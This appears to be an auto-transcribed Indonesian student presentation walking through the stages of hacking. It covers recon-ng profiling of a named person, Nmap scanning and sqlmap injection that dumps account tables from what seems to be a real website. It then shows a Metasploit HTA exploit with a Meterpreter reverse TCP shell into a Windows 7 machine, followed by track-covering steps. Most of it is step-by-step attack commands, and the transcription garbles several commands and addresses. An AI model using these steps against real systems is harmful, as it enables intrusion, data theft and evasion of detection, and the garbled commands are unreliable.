Assalamualaikum warahmatullahi wabarakatuh. Kami dari kelompok 3 akan menjelaskan tahapan hacking account Seal. Sebelumnya izinkan kami memperkenalkan diri. Nama saya Yuliana dengan NIM 191351220. Nama saya Johannes dengan NIM 191351046. Nama saya Dewi Amalia dengan NIM 191351132. Di sini saya akan menjelaskan tahapan reconnaissance. Reconnaissance adalah tahap kegiatan di mana hacker atau pihak yang akan melakukan serangan berusaha mencari informasi sebanyak-banyaknya mengenai target atau sasaran sistem yang ingin diserang sebelum rangkaian itu penyerangan dilaksanakan. Lalu informasi yang didapatkan itu seperti IP address, topologi network, network resource, dan informasi personal tentang user. Lalu selanjutnya di sini kita akan melakukan hacking di Kali Linux. Pertama, kita ketik recon ng untuk masuk ke tools recon ng-nya. Oke, sudah. Selanjutnya kita di sini Lalu selanjutnya di sini kita membuat workspace create wasneti. Kita ketikkan aja workspace create wasneti. Ya, selanjutnya kita ketik marketplace untuk mendapatkan modul yang ada di recon ng. Ya, selanjutnya di sini karena kita sudah menginstal, kita lanjutkan saja dengan mengetik modules load recon space recon slash profiles strip profiles slash profiler. Nah, selanjutnya lalu kita ketik option set source Jack Ma. Ini untuk menargetkan korban yang ingin diintai. Lalu selanjutnya kita ketik run. Nah, setelah mendapatkan total data korban yang akan kita intai, lalu kita membuat report di HTML. Setelah mendapatkan total data korban yang kita intai, selanjutnya kita ketikkan modules load reporting /html. Selanjutnya kita ketik option set file name wasneti. Selanjutnya selanjutnya kita ulang ya. Kita ketikkan kembali options set file name wasneti. Lalu selanjutnya kita ketik options set creator wasneti. Nah, selanjutnya setelah itu kita ketikkan kembali option set customer Jack Ma. Nah, setelah itu kita run. Nah, selanjutnya setelah berhasil, kita akan masuk ke folder. Setelah itu kita ke file system, terus cari file USR. Selanjutnya ke file share, terus terakhir ke file recon ng. Nah, di sini terdapat file wasneti-nya.
Kita klik. Nah, di sini kita mendapatkan informasi yang sudah kita lacak, yang sudah kita hacker ya. Selanjutnya, saya akan menjelaskan tahapan scanning. Scanning adalah suatu prosedur yang dilakukan untuk mengidentifikasi host, port, dan service pada network. Scanning dilakukan dengan mengscan port TCP/IP untuk mengetahui open port dari sebuah live host. Kami melakukan scanning menggunakan tools Nmap. Pertama, untuk melakukan scanning, kami akan melakukan ping di CMD. Ping pada website of Bol. Lalu IP pun didapatkan. Lalu kita salin. Selanjutnya kita membuka tools Nmap. Pada tools ini kita hanya memasukkan IP target korban. Lalu klik scan. Kita tunggu. Hasil scanning yang telah tadi dilakukan, dan dari hasil scanning ini terdapat 1, 2, 3, 4 port yang terbuka. Saya akan menjelaskan tahapan gaining access. Gaining access adalah mendapatkan akses atau merupakan langkah untuk mendapatkan data lebih banyak lagi untuk mulai mencoba mengakses sasaran, meliputi, mengintip, dan merampas password atau menebak password serta melakukan buffer overflow. Saya di sini melakukan praktek SQL injection di Kali Linux menggunakan tools SQLmap terhadap web yang akan kita serang, yaitu web of Bol. Bukan target, kita lanjutkan eksekusi dengan ketikan perintah SQLmap -u, lalu linknya. -dbs, lalu enter. Ketika mendapatkan perintah seperti ini, kita ketikkan no atau n. Bisa kita lihat hasilnya pada web tersebut terdapat 6 database yang berhasil terdeteksi. Selanjutnya, kita serang lebih dalam. Misalnya kita ingin mengetahui isi tabel dari database SQL 199135_1 dengan perintah SQLmap -u link -d lalu nama databasenya strip tabel, lalu enter. Dengan perintah ini kita mengetikkan n atau no.
Dari perintah tersebut, kita bisa tahu ada tabel apa saja dalam database, salah satunya tabel untenti. Mari kita lihat isi tabel untenti dengan mengetikkan perintah sqlmap -u, linknya -d, -d, lalu nama databasenya, -t, nama tabelnya untenti -dam. Ketika muncul perintah tersebut, kita klikkan N. Akhirnya kita bisa melihat database SQL-nya dari sebuah akun. Contohnya ID, nama, email, dan sebagainya. Dan penjelasan scanning dan gaining akses dari saya selanjutnya akan dijelaskan oleh rekan saya Johannes. Nah, untuk kali ini saya Johannes Musanipar akan menjelaskan tentang tutorial maintain access. Pertama-tama kita membuka KAI Linux. Maintain access adalah cara untuk menerobos atau mengakses OS si korban. Dengan saya sih menggunakan OS Windows 7. Untuk kalian yang belum punya OS Windows 7, segera download yang ada di Google atau di link manapun yang kalian tahu untuk Windows 7 di VirtualBox ya. Di pertama-tama kita harus di KAI Linux ini kita harus memerintahkan MSF console untuk mengaktifkan Metasploit atau tools Metasploit yang saya gunakan. Nah, untuk kali ini Metasploitnya sudah jalan ya. Lalu di sini Anda mengetikkan use exploit /windows misc lalu hta underscore server. Nah, di sini kalian sudah masuk ke folder Windows misc hta server. Nah, di sini langsung mencantumkan localhostnya ya. Localhostnya itu IP localhostnya itu IP Linux kalian. Nah, di sini IP Linux saya dengan mengetikkan set lhost enter, lalu set server hostnya, enter, lalu set payloadnya untuk jembatannya dengan cara mengetikkan set payload Windows meterpreter /reverse /tcp. Di sini mengetikkan set lport. Di sini kalian bebas mau lport apa aja. Saya di sini mengetikkan 888, lalu ketik run. Nah, di sini URL ini adalah URL untuk men-sharing virus dengan cara di internetnya men-share link ini dengan catatan OS si korban harus off atau offline atau dalam keadaan mati. Nah, di sini lalu saya ke OS Windows 7.
sambil mengetikkan http 92.168 100.29 /tvici mvr .hta. Nah, di sini di Linux ini terjadi respon ya. Apa yang terjadi di Windows 7 si korban. Di Windows 7 ini saya klik run low. Nah, sekali Linux ini memberi pesan bahwa sudah masuk ke backdoor si OS Windows 7. Sudah memberikan akses. Saya ketik sessions. Nah, di sini sudah ada ya si OS si korban information Johannes yang ada di Windows 7 yang saya gunakan. Lalu saya mengecek. Nah, di sini saya langsung mengetikkan sessions untuk lebih dalam lagi untuk memasuki si OS Windows-nya. Langsung min i 1. Nah, di sini si Metasploit ini memulai interaksi kepada OS yang saya gunakan atau OS Windows 7. Di sini sudah masuk ya. Kalian bebas menggunakannya atau mengaksesnya dengan bebas. Saya mengecek lokasi saya di mana dengan cara mengetik pwd. Nah, di sini di sistem 32 ya. Saya harus kembali dulu dengan mengetik cd.2 ls. Nah, ini atau dir ya. Nah, di sini saya memasukkan cd user dir. Nah, di sini ada akses buat ke saya masuki cd Johannes untuk apa yang ada di Windows 7 ini. Dir lagi. Nah, di sini sudah masuk ke OS Windows 7 yang saya pakai. Di sini kalian bebas mau ngapain aja, mau download, mau upload, mau ngehapus. Di sini bebas. Saya masuk ke CD desktop. Dir. Nah, di sini desktop ini sudah ada ya. Kalian bebas mau upload, mau hapus dengan cara kalian di sini ada toolsnya, help. Ketik help. Nah, ini ya mkdir untuk membuat folder. Di sini membuat folder ya, mkdir. Saya mengetikkan mkdir was kelompok. Nah, di sini sudah ada. Sudah terjadi ya. Untuk menghapusnya kita ketik perintah rmdir remove rmdir was kelompok. Ya, terhapus ya. Nah, berikut penjelasan dari saya tentang maintaining access. Terima kasih. Nah, untuk tahap selanjutnya saya akan menjelaskan tentang covering tracks atau menghapus jejak yang selama yang kita gunakan tadi untuk kehilangan jejak. Di sini kalian mengetikkan seret min z xuf vf outlook ya.
Nah, di sini Outlook udah kehapus. Yang tadi asalnya ini nggak ada ya. Untuk kedua, Karen Lock. Mana tuh ini? Kita klikkan kembali. Karen Lock. Nah, kita ngecek kembali. Nah, sudah kehapus ya. Mungkin sekian dari saya tentang penjelasan tentang covering tracks atau menghapus jejak setelah melakukan hacking. Mungkin sekian dari kelompok kami. Mohon maaf atas kesalahan kata yang tidak disengaja maupun disengaja. Mohon maaf untuk dan juga kekurangan dari kelompok kami. Mungkin sekian untuk